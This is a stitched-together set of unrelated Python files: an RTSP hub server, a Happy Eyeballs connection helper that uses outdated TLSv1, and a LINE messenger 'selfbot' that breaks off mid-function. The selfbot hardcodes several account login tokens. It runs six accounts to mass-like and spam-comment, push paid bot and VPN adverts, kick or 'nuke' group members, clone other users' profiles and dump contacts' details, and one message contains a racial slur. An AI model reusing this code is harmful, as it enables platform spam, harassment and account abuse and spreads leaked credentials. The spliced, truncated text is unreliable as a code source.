# Based on https://github.com/TibbersDriveMustang/Video-Streaming-Server-and-Client
from Log import log
try:
import config
except ImportError:
import config_dist as config
import socket
import threading
import RTSPServerSession
ended = False
thread = False
hubTcpSocket = False
def runThread():
global thread
log().info('Starting Hub server thread')
thread = threading.Thread(target=server)
thread.start()
def sigStopThread():
global ended
log().info('Ending Hub server thread')
ended = True
def waitStopThread():
global thread
global hubTcpSocket
if thread:
thread.join()
hubTcpSocket = False;
thread = False
def server():
global hubTcpSocket
hubTcpSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
hubTcpSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
hubTcpSocket.bind(('', config.HUB_SERVER_PORT))
log().info("Hub server Listening for incoming request on port %d...", config.HUB_SERVER_PORT)
hubTcpSocket.listen(config.HUB_LISTEN_BACKLOG)
hubTcpSocket.settimeout(config.SOCKET_TIMEOUT)
# Receive client info (address,port) through RTSP/HTTP/TCP session
while not ended:
try:
clientInfo = {}
try:
# TODO The IP address appears to be this one and not from the source. Check in Wireshark
clientInfo['connection'], (clientInfo['IP'], clientInfo['port']) = hubTcpSocket.accept()
except socket.timeout:
continue
log().debug('Received from %s on port %s', clientInfo['IP'], clientInfo['port'])
RTSPServerSession.HubServerSession(clientInfo).runThread()
except Exception as e:
log().error(e.__doc__)
log().error(str(e))
time.sleep(1)
hubTcpSocket.close()
# Program Start Point
if __name__ == "__main__":
runThread()
|
happyeyeballs.py
|
#!/usr/bin/python3
# Python implementation of RFC 6555 / Happy Eyeballs: find the quickest IPv4/IPv6 connection
# See https://tools.ietf.org/html/rfc6555
# Method: Start parallel sessions using threads, and only wait for the quickest succesful socket connect
# If the HOST has an IPv6 address, IPv6 is given a head start by delaying IPv4. See https://tools.ietf.org/html/rfc6555#section-4.1
# You can run this as a standalone program, or as a module:
"""
from happyeyeballs import happyeyeballs
print happyeyeballs('newszilla.xs4all.nl', port=119)
"""
# or with more logging:
"""
from happyeyeballs import happyeyeballs
import logging
logger = logging.getLogger('')
logger.setLevel(logging.DEBUG)
print happyeyeballs('newszilla.xs4all.nl', port=119)
"""
import socket
import ssl
import threading
import time
import logging
import queue
DEBUG = False
# called by each thread
def do_socket_connect(queue, ip, PORT, SSL, ipv4delay):
# connect to the ip, and put the result into the queue
if DEBUG:
logging.debug("Input for thread is %s %s %s", ip, PORT, SSL)
try:
# CREATE SOCKET
if ip.find(":") >= 0:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
if ip.find(".") >= 0:
time.sleep(ipv4delay) # IPv4 ... so a delay for IPv4 as we prefer IPv6. Note: ipv4delay could be 0
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
if not SSL:
# Connect ...
s.connect((ip, PORT))
# ... and close
s.close()
else:
# WRAP SOCKET
wrappedSocket = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
# CONNECT
wrappedSocket.connect((ip, PORT))
# CLOSE SOCKET CONNECTION
wrappedSocket.close()
queue.put((ip, True))
if DEBUG:
logging.debug("connect to %s OK", ip)
except:
queue.put((ip, False))
if DEBUG:
logging.debug("connect to %s not OK", ip)
pass
def happyeyeballs(HOST, **kwargs):
# Happyeyeballs function, with caching of the results
# Fill out the parameters into the variables
try:
PORT = kwargs["port"]
except:
PORT = 80
try:
SSL = kwargs["ssl"]
except:
SSL = False
try:
preferipv6 = kwargs["preferipv6"]
except:
preferipv6 = True # prefer IPv6, so give IPv6 connects a head start by delaying IPv4
# Find out if a cached result is available, and recent enough:
timecurrent = int(time.time()) # current time in seconds since epoch
retentionseconds = 100
hostkey = (HOST, PORT, SSL, preferipv6) # Example key: (u'ssl.astraweb.com', 563, True, True)
try:
happyeyeballs.happylist[hostkey] # just to check: does it exist?
# No exception, so entry exists, so let's check the time:
timecached = happyeyeballs.happylist[hostkey][1]
if timecurrent - timecached <= retentionseconds:
if DEBUG:
logging.debug("existing cached result recent enough")
return happyeyeballs.happylist[hostkey][0]
else:
if DEBUG:
logging.debug("existing cached result too old. Find a new one")
# Continue a few lines down
except:
# Exception, so entry not there, so we have to fill it out
if DEBUG:
logging.debug("Host not yet in the cache. Find entry")
pass
# we only arrive here if the entry has to be determined. So let's do that:
# We have to determine the (new) best IP address
start = time.perf_counter()
if DEBUG:
logging.debug("\n\n%s %s %s %s", HOST, PORT, SSL, preferipv6)
ipv4delay = 0
try:
# Check if there is an AAAA / IPv6 result for this host:
socket.getaddrinfo(HOST, PORT, socket.AF_INET6, socket.SOCK_STREAM, socket.IPPROTO_IP, socket.AI_CANONNAME)
if DEBUG:
logging.debug("IPv6 address found for %s", HOST)
if preferipv6:
ipv4delay = (
0.1
) # preferipv6, AND at least one IPv6 found, so give IPv4 (!) a delay so that IPv6 has a head start and is preferred
except:
if DEBUG:
logging.debug("No IPv6 address found for %s", HOST)
myqueue = queue.Queue() # queue used for threads giving back the results
try:
# Get all IP (IPv4 and IPv6) addresses:
allinfo = socket.getaddrinfo(HOST, PORT, 0, 0, socket.IPPROTO_TCP)
for info in allinfo:
address = info[4][0]
thisthread = threading.Thread(target=do_socket_connect, args=(myqueue, address, PORT, SSL, ipv4delay))
thisthread.daemon = True
thisthread.start()
result = None # default return value, used if none of threads says True/"OK", so no connect on any IP address
# start reading from the Queue for message from the threads:
for i in range(len(allinfo)):
s = myqueue.get() # get a response
if s[1] == True:
result = s[0]
break # the first True/"OK" is enough, so break out of for loop
except:
if DEBUG:
logging.debug("something went wrong in the try block")
result = None
logging.info(
"Quickest IP address for %s (port %s, ssl %s, preferipv6 %s) is %s", HOST, PORT, SSL, preferipv6, result
)
delay = int(1000 * (time.perf_counter() - start))
logging.debug("Happy Eyeballs lookup and port connect took %s ms", delay)
# We're done. Store and return the result
if result:
happyeyeballs.happylist[hostkey] = (result, timecurrent)
if DEBUG:
logging.debug("Determined new result for %s with result %s", hostkey, happyeyeballs.happylist[hostkey])
return result
happyeyeballs.happylist = {} # The cached results. This static variable must be after the def happyeyeballs()
if __name__ == "__main__":
logger = logging.getLogger("")
logger.setLevel(logging.INFO)
if DEBUG:
logger.setLevel(logging.DEBUG)
# plain HTTP/HTTPS sites:
print((happyeyeballs("www.google.com")))
print((happyeyeballs("www.google.com", port=443, ssl=True)))
print((happyeyeballs("www.nu.nl")))
# newsservers:
print((happyeyeballs("newszilla6.xs4all.nl", port=119)))
print((happyeyeballs("newszilla.xs4all.nl", port=119)))
print((happyeyeballs("block.cheapnews.eu", port=119)))
print((happyeyeballs("block.cheapnews.eu", port=443, ssl=True)))
print((happyeyeballs("sslreader.eweka.nl", port=563, ssl=True)))
print((happyeyeballs("news.thundernews.com", port=119)))
print((happyeyeballs("news.thundernews.com", port=119, preferipv6=False)))
print((happyeyeballs("secure.eu.thundernews.com", port=563, ssl=True)))
# Strange cases
print((happyeyeballs("does.not.resolve", port=443, ssl=True)))
print((happyeyeballs("www.google.com", port=119)))
print((happyeyeballs("216.58.211.164")))
|
Selfbot.py
|
# -*- coding: utf-8 -*-
import LINETCR
#import wikipedia
from LINETCR.lib.curve.ttypes import *
#from ASUL.lib.curve.ttypes import *
from datetime import datetime
# https://kaijento.github.io/2017/05/19/web-scraping-youtube.com/
from bs4 import BeautifulSoup
from threading import Thread
from googletrans import Translator
from gtts import gTTS
import time,random,sys,json,codecs,threading,glob,urllib,urllib2,urllib3,re,ast,os,subprocess,requests,tempfile
cl =LINETCR.LINE()
#cl.login(qr=True)
cl.login(token='Eq8oqZK3JTqfztqTWny7.MRMd87JLMY8NA0SCe7JEXW.vbl7Kr2tjQ1LqphHyzY3ogPStiHJgqTFB/R2kwF+ms4')
cl.loginResult()
ki = LINETCR.LINE()
ki.login(token='EqHcbM8BSq55e0TGJv3d.CjaQinvalP1FmHKChURWBq.u2K8AtO0FtfUUW19z8YCUSd6fIi6STxPO3KRZAG0CO8')
ki.loginResult()
ki2 = LINETCR.LINE()
#ki2.login(qr=True)
ki2.login(token='Eq8GV919FJNUMrNPSWc7.AT7NDdbl0H2GLxuGz4QxXW.55ZTTqTEznurl4KqO/emtDspWcZqZyP/dYp3Y0wLKWA')
ki2.loginResult()
ki3 = LINETCR.LINE()
#ki3.login(qr=True)
ki3.login(token='EqrZqWr13j43WIcnGcQe.zmCv8kW3miEalfHutIIt+G.Tz3P2Dq5yzpOk3AyoIPDCCya5W5+EaLqRfMZkyX7chE')
ki3.loginResult()
ki4 = LINETCR.LINE()
#ki4.login(qr=True)
ki4.login(token='EqIfsqgCa5qaHAWgeBt5.xYAmvk1yA8gaabeYgdSeXq.movkYMysyGsi8kvUpjL1XxnO0dBdP0NGCRge2OK6o/8')
ki4.loginResult()
ki5 = LINETCR.LINE()
#ki5.login(qr=True)
ki5.login(token='EqgBIrRvAcrk6SKDsKR9.lX4pa6L4onjySYNG0c47Qq.rI/Eeh1goMiTdeMTGpjSBYUq/cPLRSJdc7TyG2EqJcM')
ki5.loginResult()
cl
#ki6 = ASUL.LINE()
#AsulLogged = False
#cl = ASUL.LINE()
#cl.login(token='EoChmq5TXM73ZRg9P8ec.YLgVP2FFH7O3buLlL8m1xa.53z2MiS/devknmPfbJjsBhLEqtWnv6cUujv6wklIJsc')
#cl.loginResult()
print u"่❂>ͣ▪т̶є̶α̶м̶в̶σ̶т"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage ="""
╔════☬════♪•●☬●•♪════☬═══╗
่❂>ͣ▪т̶є̶α̶м̶в̶σ̶т̶ℓ
╚════☬════♪•●☬●•♪════☬═══╝
||=====☬คำสั่งทั่วไป☬=====||
☬➣ [Me]➣คอนแทคฉัน
☬➣ [Me @]➣ดูคอนแทคเพื่อน
☬➣ [Tr-th]➣แปลเป็นไทย
☬➣ [Tr-en]➣แปลเป็นอังกฤษ
☬➣ [Ginfo]➣ดูข้อมูลกลุ่ม
☬➣ [Glist]➣ส่งของขวัญ
☬➣ [Cancel]➣ยกเลิกเชิน
☬➣ [Invite]➣เชินตามคอนแทค
☬➣ [Invite: ]➣เชินด้วยเอมไอดี
☬➣ [Unban @]➣ เพิ่มบันชีขาว @
☬➣ [Unban:]➣ เพิ่มบันชีขาวmid
☬➣ [Unban on]➣ เพิ่มบันชีขาวcontact
☬➣ [Ban @ ]➣ เพิ่มบันชีดำ @
☬➣ [Ban:]➣ เพิ่มบันชีดำmid
☬➣ [Ban on ]➣ เพิ่มบันชีดำcontact
☬➣ [Clear ban]เชคแบนโชว์คอนแทค
☬➣ [Link on]☆เปิดลิ้ง
☬➣ [Link off]☆ปิดลิ้ง
☬➣ [Gurl]
☬➣ [Url ]➣ลิ้งกลุ่ม
☬➣ [Gname]
☬➣ [Banlist ]
☬➣ [Details grup]
☬➣ [on]➣ เปิดข้อความต้อนรับ
☬➣ [off]➣ ปิดข้อความต้อนรับ
☬➣ [Respon on]➣เปิดกล่างถึงคนแท้ค
☬➣ [Respon off]➣ปิดกล่าวถึงคนแท้ก
☬➣ [Inviteme:]
☬➣ [Info grup]
☬➣ [Gift-Allgift]➣ [ส่งของขวัญ-ทั้งหมด
☬➣ [Clear grup
☬➣️ [Reject]☆ลบรันตัวเอง
☬➣ [Mic:]☆เชคคอนแทค
☬➣️ [Reject1]➣ [ลบรันคิกเก้อ
☬➣ [Nuke]☆ล้างห้อง
☬➣ [Mention,Tagall]➣แทคทั้งห้อง
☬➣ [Kick @]➣ เตะ @
☬➣ [Kick::]➣ เตะmid
☬➣ [Bc:ct ]
☬➣ [Bc:grup]
☬➣ [Block @]
☬➣ [Youtube]➣ยูทูป
☬➣ [vdo]
☬➣ [Blocklist]
☬➣ [Spam on/off]➣รันข้อความแชท
☬➣ [Mybot]➣คอนแทคบอท
☬➣ [Bot:ct ]
☬➣ [Bot:grup.]
☬➣ [Allname:]
☬➣ [Allbio:]
☬➣ [Gc]☆ดูผู้สร้างห้อง
☬➣ [Speed]☆สปีดบอท
☬➣ [Conban]➣เชคแบน
☬➣ [Mycopy @] ➣ก้อปปี้โปรไฟล์
☬➣ [Copy1 @] ➣ ก้อปปี้คิกเก้อ1
☬➣ [Copy2 @] ➣ ก้อปปี้คิกเก้อ2
☬➣ [Copy3 @] ➣ ก้อปปี้คิกเก้อ3
☬➣ [Copy4 @] ➣ ก้อปปี้คิกเก้อ4
☬➣ [Copy5 @] ➣ ก้อปปีัคิกเก้อ4
☬➣ [Mybackup @ ]➣กลับคืนค่าก้อปปี้
☬➣ [Like:on/off] ➣ออโต้ไลค์ เปิด/ปิด
☬➣ [Add on/off] ➣ออโต้แอด เปิด/ปิด
☬➣ [Join on/off]➣ออโต้เข้ากลุ่ม เปิด/ปิด
☬➣ [Contact on/off]➣อ่านคอนแทค เปิด/ปิด
☬➣ [Leave on/off] ➣ออโต้ออกแชทรวม เปิด/ปิด
☬➣ [Share on/off]➣โชว์ลิ้งโพส เปิด/ปิด
☬➣ [Getname @]➣เชคชื่อเพื่อน
☬➣ [Getbio @]➣เชคตัสเพื่อน
☬➣ [Getprofile @]➣เชคเสตัสเพื่อน
☬➣ [Jam on/off]➣
☬➣ [Jam say:]
☬➣ [Com on/off]
☬➣ [Message set:]
☬➣ [Comment set:]
☬➣ [Pesan add:]
||=====☬P R O T E C T☬=====||
☬➣ [Panick:on/off]
☬➣ [Allprotect on/off]➣ล้อกทั้งหมด เปิด/ปิด
☬➣ [Protect on]☆ป้องกันเปิด/ปิด
☬➣ [Qrprotect on/off]☆ล้อกคิวอารโค้ตเปิด/ปิด
☬➣ [Inviteprotect on/off]☆เชินเปิด/ปิด
☬➣ [Cancelprotect on/off]ยกเชินเปิด/ปิด
☬➣[Staff add/remove @]
||=======☬FOR ADMIN☬=======||
▀██▀────██─██──██████
─██──██────██──██
─████──────██──██████
─██──██────██──██
▄██▄───██──██──██████
╔════☬════♪•●☬●•♪════☬═══╗
Http://line.me/ti/p/~getk3333
╚════☬════♪•●☬●•♪════☬═══╝
||=========================||
"""
help2Message =""" ||==่❂>ͣ▪т̶є̶α̶м̶в̶σ̶т̶ℓ==||
☬คท - ส่งคท.ตัวเอง(Me)
☬ไอดี - ส่งMidตัวเอง
☬คิกเกอร์ - เชคคท.คิกเกอร์ทั้งหมด
☬คิกมา - เรียกคิกเกอร์เข้ากลุ่ม
☬คิกออก - สั่งคิกเกอร์ออกกลุ่ม
☬จุด - ตั้งจุดเชคคนอ่าน
☬อ่าน - เชครายชื่อคนอ่าน
☬เชคกลุ่ม - เชคข้อมูลกลุ่ม
☬ลิสกลุ่ม - เชคกลุ่มที่มีทั้งหมด
☬ยกเชิญ,ยก - ยกเลิกเชิญ
☬Mid @ - เชคMidรายบุคคล
☬ดึง - เชิญคนเข้ากลุ่มด้วยคท.
☬ดึง: - เชิญคนเข้ากลุ่ม้ดวยMid
☬ขาว - แก้ดำ(ส่งคท.)
☬ดำ - เพิ่มบัญชีดำ(ส่งคท.)
☬เชคดำ - เชคบัญชีดำ
☬ล้างดำ - ล้างบัญชีดำ
☬เปิดลิ้ง
☬ปิดลิ้ง
☬ลิ้ง - เปิดและขอลิ้งกลุ่ม
☬Gname: - เปลี่ยนชื่อกลุ่ม
☬ลบรัน - ลบรันตัวเอง
☬ลบรัน1 - ลบรันให้เพื่อน(ขอลิ้งให้ลอคอินก่อน)
☬ขอลิ้ง - ขอลิ้งให้เพื่อนลอคอิน
☬. - เชคสถานะลอคอิน
☬Sp - เชคสปีด
☬Bot sp - เชคสปีดคิกเกอร์
☬Mycopy @ - กอพปี้โปรไฟล์
☬Copy @ - คิกเกอร์1กอพปี้
☬Mybackup - กลับร่างเดิม
☬Backup - คิกเกอร์1กลับร่างเดิม
☬Spam on/off - ส่งข้อความสแปม
||==========||
✯★Creator By 👉่❂>ͣ▪т̶є̶α̶м̶в̶σ̶т̶ℓ👈
"""
helo=""
KAC=[cl,ki,ki2,ki3,ki4,ki5]
mid = cl.getProfile().mid
kimid = ki.getProfile().mid
ki2mid = ki2.getProfile().mid
ki3mid = ki3.getProfile().mid
ki4mid = ki4.getProfile().mid
ki5mid = ki5.getProfile().mid
bot1 = cl.getProfile().mid
Bots = [mid,kimid,ki2mid,ki3mid,ki4mid,ki5mid]
admsa = "u9ab983f3b8e59b2f276b4b1c13b8dec7"
admin = "u9ab983f3b8e59b2f276b4b1c13b8dec7"
wait = {
'contact':True,
'detectMention':True,
'autoJoin':False,
'autoCancel':{"on":False,"members":1},
'leaveRoom':True,
'timeline':False,
'autoAdd':False,
'message':"""
[ AOTO LIKE ]
[ SELF BOT ]
[By.☬่❂>ͣ▪т̶є̶α̶м̶в̶σ̶т̶ℓ☬]
http://line.me/ti/p/~getk9999
─██─███─███─██─██─██▄█
─██─▀██▄██▀─▀█▄█▀─██▀█
▄██▄▄█▀▀▀─────▀──▄██▄▄█
[By.☬่❂>ͣ▪т̶є̶α̶м̶в̶σ̶т̶ℓ☬]
http://line.me/ti/p/~getk9999""",
"lang":"JP",
"comment":"Auto Like By ",
"welmsg":"welcome to group",
"commentOn":False,
"comment1":"""
[ AOTO LIKE ]
[ SELF BOT ]
[By.☬่❂>ͣ▪т̶є̶α̶м̶в̶σ̶т̶ℓ☬]
http://line.me/ti/p/~getk9999
▀██▀────██─██──██████
─██──██────██──██
─████──────██──██████
─██──██────██──██
▄██▄───██──██──██████
[By.☬่❂>ͣ▪т̶є̶α̶м̶в̶σ̶т̶ℓ☬]
http://line.me/ti/p/~getk9999""",
"comment2":"Bot Auto Like ©By : Nadya\nContact Me : 👉 line.me/ti/p/~getk9999",
"comment3":"Bot Auto Like ©By : Nadya\nContact Me : 👉 line.me/ti/p/~getk9999.",
"comment4":"Bot Auto Like ©By : Nadya\nContact Me : 👉 line.me/ti/p/~getk9999.",
"commentOn":True,
"wc":False,
"likeOn":True,
"wc":False,
"commentBlack":{},
"wblack":False,
"Notifed":False,
"Notifedbot":False,
"atjointicket":False,
"dblack":False,
"clock":False,
"Sambutan":False,
"tag":False,
"pesan":"☺อย่าแท้กบ่อยน่ะเดะจับเยสเรย☺",
"cNames":"",
"blacklist":{},
"group":False,
"wblacklist":False,
"dblacklist":False,
"protect":False,
"cancelprotect":False,
"inviteprotect":False,
"linkprotect":False,
}
settings = {
"simiSimi":{}
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
"ricoinvite":{},
'ROM':{},
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
setTime = {}
setTime = wait2['setTime']
blacklistFile='blacklist.txt'
pendinglistFile='pendinglist.txt'
contact = cl.getProfile()
mybackup = cl.getProfile()
mybackup.displayName = contact.displayName
mybackup.statusMessage = contact.statusMessage
mybackup.pictureStatus = contact.pictureStatus
contact = ki.getProfile()
backup = ki.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
user1 = mid
user2 = ""
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
tex = ["+","@","/",">",";","^","%","$","^","サテラ:","サテラ:","サテラ:","サテラ:"]
for texX in tex:
for command in commands:
if string ==command:
return True
return False
def bot(op):
global LINETCRLogged
global ki
global user2
global readAlert
try:
if op.type == 0:
return
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 19:
if mid in op.param3:
wait["blacklist"][op.param2] = True
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == "ub8e146e024acdc277a3ba6a7d7a30ca9":
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
G = cl.getGroup(list_[1])
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
cl.sendText(msg.to,"error")
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
ki.like(url[25:58], url[66:], likeType=1001)
ki2.like(url[25:58], url[66:], likeType=1001)
ki3.like(url[25:58], url[66:], likeType=1001)
ki4.like(url[25:58], url[66:], likeType=1001)
ki5.like(url[25:58], url[66:], likeType=1001)
cl.comment(url[25:58], url[66:], wait["comment1"])
ki.comment(url[25:58], url[66:], wait["comment1"])
ki2.comment(url[25:58], url[66:], wait["comment1"])
ki3.comment(url[25:58], url[66:], wait["comment1"])
ki4.comment(url[25:58], url[66:], wait["comment1"])
ki5.comment(url[25:58], url[66:], wait["comment1"])
if "MENTION" in msg.contentMetadata.keys() != None:
if wait['detectMention'] == True:
contact = cl.getContact(msg.from_)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cName = contact.displayName
msg.text1 = "@"+cName+" "
# balas = ["แท็คทำไมครับ(..)รึสนใจจะเอาเราไปใช้\nสนใจติดต่อได้ที่\nLine ID : Kmzaaa\nhttp://line.me/ti/p/eOuAF1hhYx\nటู้ສန้ণს☣နัဂສ૭ບĆĿŰß☣"]
balas = ["มีเชลบอทลบรัน พร้อมคิกเก้อ💟\nลบบินกลุ่ม ออโต้ไลค์ และอื่นๆอีกมากมาย\n🔒กันสมาชิกเปิดลิ้งห้อง\n🔒กันรัน\n🔒กันสมาชิกเชิญคนนอกเข้า\n🔒กันสมาชิกเปลี่ยนชื่อกลุ่ม\n🔒กันคนนอกเข้ามาลบคนในกลุ่ม\n👉และมีเชิพเวอร์vpn(เน็ต) มีทั้งรายเดือนและรายวัน👈\n👉สนใจติดต่อลิ้งด้านล่างเรยครับ👈\nโอนเข้าบัญชี💲เทานั้น\nสนใจ แอดมาคุยได้\nhttp://line.me/ti/p/~getk3333\nhttp://line.me/ti/p/~getk9999"]
ret_ = msg.text1 + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata["MENTION"])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
cl.sendImageWithURL(msg.to,image)
break
#if "MENTION" in msg.contentMetadata.keys() != None:
# if wait['kickMention'] == True:
# contact = cl.getContact(msg.from_)
# cName = contact.displayName
# balas = ["Dont Tag Me!! Im Busy, ",cName + " Ngapain Ngetag?, ",cName + " Nggak Usah Tag-Tag! Kalo Penting Langsung Pc Aja, ", "-_-, ","Putra lagi off, ", cName + " Kenapa Tag saya?, ","SPAM PC aja, " + cName, "Jangan Suka Tag gua, " + cName, "Kamu siapa, " + cName + "?", "Ada Perlu apa, " + cName + "?","Tag doang tidak perlu., "]
#3 ret_ = "[Auto Respond] " + random.choice(balas)
# name = re.findall(r'@(\w+)', msg.text)
# summon(op.param1,[op.param2])
#3 mention = ast.literal_eval(msg.contentMetadata["MENTION"])
# mentionees = mention['MENTIONEES']
# for mention in mentionees:
# if mention['M'] in Bots:
# cl.sendText(msg.to,ret_)
# cl.kickoutFromGroup(msg.to,[msg.from_])
# break
if op.type == 17:
if wait["Sambutan"] == True:
if op.param2 in admin:
return
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
print "MEMBER JOIN TO GROUP"
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
# ----------------- NOTIFED MEMBER JOIN GROUP
if op.type == 17:
if wait["group"] == True:
if op.param2 in admin:
return
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendText(op.param1, " ยินดีต้อนรับ. เข้ามาแล้วก็อย่าลืมลงแชร์กันน่ะครับ @ " + cl.getContact(op.param2).displayName + " สู่กลุ่ม " + "👉" + str(ginfo.name) + "👈""\nหรือสนใจลงบอทป้องกัน , บอทแท็ก ติดต่อได้ที่Line ID : Kmzaaa\nhttp://line.me/ti/p/eOuAF1hhYx")
cl.sendImageWithURL(op.param1,image)
print "ada orang masuk grup"
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
# ----------------- NOTIFED MEMBER OUT GROUP
if op.type == 15:
if wait['group'] == True:
if op.param2 in bot1:
return
cl.sendText(op.param1,"good Bye @ " + cl.getContact(op.param2).displayName + "รีบไปไหนอ่ะ. ไม่เป็นไรไว้เจอกันใหม่น่ะจ๊ะ")
print ("MEMBER HAS LEFT THE GROUP")
# ----------------- NOTIFED MEMBER JOIN GROUP
if op.type == 17:
if wait['group'] == True:
if op.param2 in bot1:
return
ginfo = cl.getGroup(op.param1)
cl.sendText(op.param1, "😊ยินดีต้อนรับ 😊 @ " + cl.getContact(op.param2).displayName + " สู่กลุ่ม " + "👉" + str(ginfo.name) + "👈""\n\n😃เข้ามาแร้วอย่าดื้อน่ะหนู😄")
print "MEMBER HAS JOIN THE GROUP"
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
# ----------------- NOTIFED MEMBER JOIN GROUP
# if op.type == 17:
# if wait["group"] == True:
# if op.param2 in admin:
# return
# ginfo = cl.getGroup(op.param1)
# contact = cl.getContact(op.param2)
# image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
# cl.sendImageWithURL(op.param1,image)
# print "ada orang masuk grup"
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["ricoinvite"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
ki.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
cl.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
cl.sendText(msg.to,"Call my daddy to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
ki.findAndAddContactsByMid(target)
ki.inviteIntoGroup(msg.to,[target])
random.choice(KAC).sendText(msg.to,"Invited this nigga💋: \n➡" + _name)
wait2["ricoinvite"] = False
break
except:
cl.sendText(msg.to,"Negative, Err0r Detected")
wait2["ricoinvite"] = False
break
# if op.type == 25:
# msg=op.message
# if "@"+cl.getProfile().displayName in msg.text:
# if wait["tag"] == True:
# tanya = msg.text.replace("@"+cl.getProfile().displayName,"")
# jawab = (wait["pesan"])
# jawaban = (jawab)
# contact = cl.getContact(msg.from_)
# path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
# cl.sendImageWithURL(msg.to, path)
# cl.sendText(msg.to,jawaban)
# print "ada orang tag"
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"sudah masuk daftar hitam👈")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"Itu tidak berkomentar👈")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"Tidak ada dalam daftar hitam👈")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"sudah masuk daftar hitam")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"Done👈")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done👈")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"Done👈")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "💟ลิ้งโพสอยู่ด้านล้างน้ะจ้ะ💟\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
